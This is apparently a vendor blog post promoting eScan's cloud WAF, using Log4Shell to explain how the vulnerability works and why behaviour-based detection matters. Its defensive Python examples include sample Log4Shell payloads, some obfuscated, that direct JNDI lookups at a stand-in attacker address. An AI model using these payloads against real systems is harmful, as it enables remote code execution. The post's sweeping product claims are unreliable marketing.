Cloud-native security tooling, built on big data and AI to monitor for and pre-empt attacks, is primarily concerned with defending against identifiable threats. Yet no system is completely impervious, no matter how much effort goes into it, and protection against known threats is never truly good enough while undetected vulnerabilities remain. eScan’s next-generation Web Application and API Protection is built to mitigate those unknown risks and strengthen your overall security posture.
A security expert focuses on known risk indicators.
Most of our industry concentrates on avoiding coding errors and identifying the avenues an attacker could exploit. The most dangerous attacks, however, are the ones that catch us completely unprepared: we only learn they exist once they are already under way. Today we’ll discuss how to identify these threats early, and how to prevent them altogether with eScan Ultra.
A brief history of cloud so far
It began around 12 years ago, with our new ability to run much stronger algorithms.
- Data was finally collected and analysed at scale… in fact, that’s what we called it: big data.
- That data also had to be stored cost-effectively, which led to the virtual network.
- As mobile applications exploded across the globe, data suddenly needed to move around and be everywhere… and so cloud service providers were born. With everything implemented as scalable code, applications were broken down into services running on virtual machines that spun up only when needed.
- Machine learning was then applied to that data to optimise it and generate deep insights.
- Kubernetes let developers and service providers write and run services with far more precision.
- The cryptocurrency boom drove GPU processing capacity, which in turn made generative AI possible.
- Lastly, Covid gave the cloud its biggest boost of all.
Cloud services are a necessity because of remote endpoints, the need to access data from anywhere, and the pace of technology. Thousands of businesses, from small companies to large enterprises, run in the cloud today.
Cloud computing is not a problem – it’s a solution.
As the cloud matures to the point of ubiquity, it has become an integral part of our daily lives. Professionals often become so absorbed in resolving the challenges of cloud computing that it is easy to lose sight of what a remarkable thing the cloud is. We now have access to benefits and opportunities that were previously unimaginable. It has, however, brought problems of its own.
It is vital to understand that the cloud is not the problem; it is the solution. Used well, the cloud will improve our security measures and increase the impact of what we do.
Data exchange happens through two main channels. The first is the cloud front door, where users submit requests to the cloud application over the public internet, mobile networks and VPNs. The second is the service door, through which code and data are constantly pushed into the application. In essence, we protect the wiring: to keep the exchange safe, we analyse each request and use tools to confirm that it makes sense.
Every request from a user poses a potential risk ….
This wealth of data can also be a source of trouble, because it is exchanged across many channels and hybrid clouds. The simplified supply-chain diagram shows the many components exchanging data, any of which can serve as a backdoor for attackers.
Whenever data is exchanged between components, there is a risk of it being compromised or manipulated. You also depend on many third-party feeds and services for data sharing, and those may be at risk too.
Training our troops, securing our assets in the field and defending ourselves all matter… but we should aim to prevent the war in the first place.
As part of our security strategy we employ a range of measures: a WAF for the front door, a CSPM for the cloud’s contents, and code scanning and network security for the endpoints. These give us confidence that known risks can be managed. We must remain vigilant and adaptable, however, because unknown risks can never be ruled out.
Here are a few basic definitions to help us understand what we are protecting ourselves from.
Known vulnerabilities are exposures we create ourselves, such as:
- Misconfigured or exposed credentials,
- Known software vulnerabilities that allow malicious activity until they are patched, and…
Dynamic risk indicators come from an open database of attack indicators: suspicious behavioural patterns, malicious IP addresses and known attack patterns.
By continuously monitoring these indicators and issues, we can provide posture management, protection and zero tolerance across your application network.
Unknown vulnerabilities include:
- Undiscovered software vulnerabilities that cause a component to deviate from its intended function, allowing access or manipulation.
- Exploitable backdoors, whether designed in intentionally (for example, forgotten-password functions) or installed unintentionally by malicious actors or software.
- New attack techniques and methods that attackers keep inventing and that we do not know about yet.…
The problem is that we don’t really know how to protect against these unknown risks. They are exactly what attackers look for, which is one reason zero-day exploits are so common.
We cannot know about CVEs until they have been assigned
Newly discovered vulnerabilities are mainly communicated as CVEs (Common Vulnerabilities and Exposures), which keep security teams informed of the latest problems and, often, of their solutions and patches.
Globally, more than 25,000 CVEs have been published so far in 2022, the highest number on record. That works out at an average of 68 new CVEs every single day of the year, of which roughly one-third are rated high or critical.
It is also important to recognise that resolving a CVE takes 65 days on average, so until a patch for the underlying issue exists you depend on your WAF for protection. And a WAF is blind to unknown attacks until a signature is released.
Here is our main use case: Log4Shell.
There are many reasons why Log4Shell is a great example:
- Log4j, a Java logging library, runs on hundreds of millions of machines. Almost every large application uses it in one way or another.
- In the first 72 hours after disclosure, more than 800,000 attack attempts were recorded, both because it was easy to exploit and because attackers gained deep access.
- The number of attacks since 2021 is almost impossible to determine, but we estimate the damage at over 1.5 billion dollars, which should give you some indication.
- An interesting fact: 1 in 4 applications still uses a vulnerable Log4j version.
Log4Shell also shows how things can get worse before they improve.
- Generally, a vulnerability is assigned a CVE number within two days of its discovery.
- Within a week of 1 December, in-the-wild exploitation had already been detected.
- After Apache publicly announced the vulnerability on 9 December, with a patch for the affected Log4j 2 versions, the real mess began. At first it seemed organisations could start mitigating immediately; then it took Apache five long days to realise that the even more widely used Log4j 1 was also vulnerable, and patching had to start from scratch.
- The situation was complicated further on 17 December, when an additional CVE disclosed many more exploit scenarios. After more than a month of new issues and variants, it took security teams 35 days to begin patching critical assets. Here’s the simple maths: if it takes 35 days to contain and a further 65 days to remediate, you are exposed for a hundred days. That’s a lot of days.
- The vulnerability in Java logging makes it easy for an attacker to attach a malicious string to a login or search request.
Log4Shell works because Log4j 2 performs lookups on the text it logs: a string of the form ${...} inside a log message is substituted with external content when the message is processed. One of the supported lookup types is the Java Naming and Directory Interface (JNDI), and a JNDI URL can point at an LDAP (or RMI) server. An attacker therefore only has to get text containing a malicious JNDI URL, for example in a User-Agent header or a username, into any field the application logs; Log4j contacts the attacker’s server, and the response can cause remote code to be loaded and executed. Attackers have used this to break into virtualisation infrastructure, install and run ransomware, steal system credentials and move through compromised networks.
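To show concretely what a WAF has to contend with, here is an added example in Python; it is not eScan’s code and not part of the original post. It normalises the nested-lookup obfuscation attackers used against Log4Shell (the ${lower:...}, ${upper:...} and ${...:-default} forms) before matching on ${jndi:, and it reports lookups it cannot resolve as suspicious rather than passing them. The IP address 203.0.113.5 and the sample header values are constructed test data, and the lookup semantics modelled are only the subset attackers rely on, not Log4j’s full substitution engine.

```python
import re
from dataclasses import dataclass
from typing import Optional

# An innermost lookup: a ${...} whose body contains no further '$', '{' or '}'.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What we ultimately want to catch once the obfuscation is stripped away.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
_MAX_ROUNDS = 32  # bound the fixed-point loop so a pathological input cannot spin us


def _resolve(body: str) -> Optional[str]:
    """Evaluate one innermost lookup body the way an attacker expects Log4j to.

    Only the pieces attackers use to spell 'jndi' are modelled: the lower/upper
    lookups and the ':-' default-value syntax. env/sys/date and everything else
    are treated as unresolvable (we are offline), which is exactly why payloads
    pair them with a default, e.g. ${env:NOPE:-j}. Returns None when the body
    cannot be resolved and carries no default.
    """
    name, default = (body.split(":-", 1) + [None])[:2]
    prefix, _, key = name.partition(":")
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    return default  # may be None


def _substitute(match: "re.Match[str]") -> str:
    resolved = _resolve(match.group(1))
    return match.group(0) if resolved is None else resolved


def normalize(value: str) -> str:
    """Collapse nested lookups inside-out until nothing changes, so an
    obfuscated payload reduces to its canonical ${jndi:...} form."""
    for _ in range(_MAX_ROUNDS):
        new_value = _INNERMOST.sub(_substitute, value)
        if new_value == value:
            break
        value = new_value
    return value


@dataclass
class Verdict:
    action: str        # "block", "suspicious" or "allow"
    normalized: str    # the value after lookup normalisation


def inspect_value(value: str) -> Verdict:
    """Classify one user-controlled field (header, query parameter, form value)."""
    normalized = normalize(value)
    if _JNDI.search(normalized):
        return Verdict("block", normalized)
    if "${" in normalized:
        # A lookup we could not resolve. Legitimate users never send Log4j
        # lookup syntax, so this deserves a closer look rather than a pass.
        return Verdict("suspicious", normalized)
    return Verdict("allow", normalized)


# Constructed sample User-Agent values; 203.0.113.5 is a documentation address.
SAMPLES = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    "${jndi:ldap://203.0.113.5:1389/a}",
    "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.5/a}",
    "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.5/x}",
    "${${env:NOPE:-j}ndi:dns://203.0.113.5/x}",
    "${${date:'j'}ndi:ldap://203.0.113.5/x}",   # uses a lookup we do not model
    "${java:version}",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        verdict = inspect_value(sample)
        print(f"{verdict.action:10} {sample!r:70} -> {verdict.normalized!r}")
```

The suspicious tier exists for the same reason the post gives: a signature, even with normalisation in front of it, only catches the variants it anticipates. The ${date:'j'}ndi sample above still slips past the block rule because the date lookup is not modelled, and Log4j’s own recursion handling turned out to have problems of its own (hence the bounded loop). That gap is the argument for behaviour-based detection on top of pattern matching.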
From the analysis of static data to the analysis of contextual data
Was there a way to block Log4Shell? Yes, that’s the simple answer. Doing so requires machine learning and artificial intelligence to be used to their full extent.
As artificial intelligence has evolved, it has let us do many incredible things, from optimising how we handle large amounts of data to improving processes. With a CNAPP and data consolidation, we can now analyse our threat data in its entirety and gain insights that help us improve and scale our security.
Wouldn’t it be better to point the same AI inward rather than outward? With a deep understanding of the application’s normal behaviour, we should be able to detect anything that is out of the norm and block it.
Here’s how we use eScan Cloud Security WAF to achieve just that.
Using a patented machine-learning engine, eScan Cloud Security WAF continuously analyses users’ web and API requests over HTTP. The engine learns how users normally interact with your web application and automatically flags requests that fall outside normal operation. Flagged requests are then analysed further to determine whether they are malicious. That precision lets us block attacks without relying on signatures or rules to detect them.
eScan Cloud Security WAF is a next-generation web application firewall. Because it is distributed, it intercepts every HTTP interaction and analyses it in real time within the cloud environment. To protect against both known and unknown threats, it uses two steps rather than signatures or rules.
First, a machine-learning-based enforcement engine examines the HTTP request for attack indicators. The evaluation uses a supervised model that identifies indicators and assigns each a specific statistical likelihood of being part of an attack.
Scores are assigned to each indicator individually and to pairs of indicators, and indicators are associated with the attack families in which they tend to occur. From this scoring, eScan Cloud Security WAF estimates the attack likelihood of an HTTP request with high accuracy.
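To make the "learn normal, flag abnormal" idea concrete, here is an added example in Python. It is not eScan’s engine (which the post describes as a patented, supervised model) and not code from the original page. It builds a positive-security baseline per endpoint from a small set of constructed benign requests, recording the character classes and maximum length of every query parameter and profiled header, and then scores new requests by how far they deviate. The endpoint, request shapes and the address 203.0.113.5 are constructed for illustration.

```python
import string
from typing import Dict, List, Tuple
from urllib.parse import parse_qsl, urlsplit

# Coarse character classes. A field is flagged when it contains a class that
# never appeared in that field during learning; '$', braces, quotes, '<' and
# non-ASCII all fall into "other".
CLASSES = {
    "alpha": set(string.ascii_letters),
    "digit": set(string.digits),
    "space": {" "},
    "common": set(".-_/:@,()+;="),
}


def char_classes(value: str) -> set:
    seen = set()
    for ch in value:
        for name, chars in CLASSES.items():
            if ch in chars:
                seen.add(name)
                break
        else:
            seen.add("other")
    return seen


def fields(request: dict) -> Dict[str, str]:
    """Flatten a request into the user-controlled fields we profile:
    query parameters plus a few headers that commonly end up in logs."""
    parts = urlsplit(request["path"])
    out = {f"query:{k}": v for k, v in parse_qsl(parts.query, keep_blank_values=True)}
    for header in ("User-Agent", "Referer", "X-Api-Version"):
        if header in request["headers"]:
            out[f"header:{header}"] = request["headers"][header]
    return out


class Baseline:
    """Per-endpoint profile of every field: character classes seen and longest value."""

    def __init__(self) -> None:
        self.profiles: Dict[Tuple[str, str], Dict[str, dict]] = {}

    @staticmethod
    def _key(request: dict) -> Tuple[str, str]:
        return request["method"], urlsplit(request["path"]).path

    def learn(self, request: dict) -> None:
        profile = self.profiles.setdefault(self._key(request), {})
        for name, value in fields(request).items():
            entry = profile.setdefault(name, {"classes": set(), "max_len": 0})
            entry["classes"] |= char_classes(value)
            entry["max_len"] = max(entry["max_len"], len(value))

    def score(self, request: dict) -> Tuple[int, List[str]]:
        """Return (number of deviations, human-readable reasons) for one request."""
        profile = self.profiles.get(self._key(request))
        if profile is None:
            return 1, ["endpoint never seen during learning"]
        reasons: List[str] = []
        for name, value in fields(request).items():
            entry = profile.get(name)
            if entry is None:
                reasons.append(f"{name}: field never seen on this endpoint")
                continue
            unseen = char_classes(value) - entry["classes"]
            if unseen:
                reasons.append(f"{name}: unseen character classes {sorted(unseen)}")
            if len(value) > 2 * entry["max_len"]:
                reasons.append(f"{name}: length {len(value)} exceeds 2x baseline max {entry['max_len']}")
        return len(reasons), reasons


# Constructed benign traffic standing in for the learning phase.
BENIGN_TRAFFIC = [
    {"method": "GET", "path": "/search?q=running+shoes&page=1",
     "headers": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}},
    {"method": "GET", "path": "/search?q=winter+jacket&page=2",
     "headers": {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Safari/605.1.15"}},
    {"method": "GET", "path": "/search?q=laptop+stand",
     "headers": {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"}},
]

# Constructed Log4Shell probe: same endpoint, payload carried in the User-Agent.
LOG4SHELL_PROBE = {"method": "GET", "path": "/search?q=shoes",
                   "headers": {"User-Agent": "${jndi:ldap://203.0.113.5/a}"}}


def build_baseline(requests=BENIGN_TRAFFIC) -> Baseline:
    baseline = Baseline()
    for request in requests:
        baseline.learn(request)
    return baseline


if __name__ == "__main__":
    print(build_baseline().score(LOG4SHELL_PROBE))
```

Run against the constructed probe, the only deviation reported is that the User-Agent contains a character class ("$" and braces) never seen during learning; no ${jndi: signature is involved, which is the property the post is after. The flip side shows up if you feed it q=price $20: the same rule fires. A baseline on its own is therefore a suspicion, not a verdict, and that is what the second, contextual stage described next is for.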
Here’s where your traditional WAF ends.
The second part, however, is the most interesting:
Suspicious HTTP requests are passed to the contextual machine-learning evaluation engine, which builds further confidence that each request flagged as potentially malicious really is an attack. It correlates a number of additional parameters, including the application structure, user and crowd behaviour, the content the user supplied and the transactions involved.
The result is highly accurate detection of irregular or harmful requests, which are then blocked before they enter the application.
Over the past year, eScan Cloud Security WAF has blocked all major zero-day attacks, including Log4Shell, Spring4Shell and MOVEit. Customers were protected from day one without deploying any updates.
PROVEN PREVENTION-FORCE CLOUD SECURITY PLATFORM
eScan Cloud Security is a platform dedicated to securing your cloud environment with a single, unified approach. Its prevention-first design ensures consistency and repeatability across cloud providers. Wherever a risk originates, we protect you against both known and unknown risks, before they reach production and at runtime.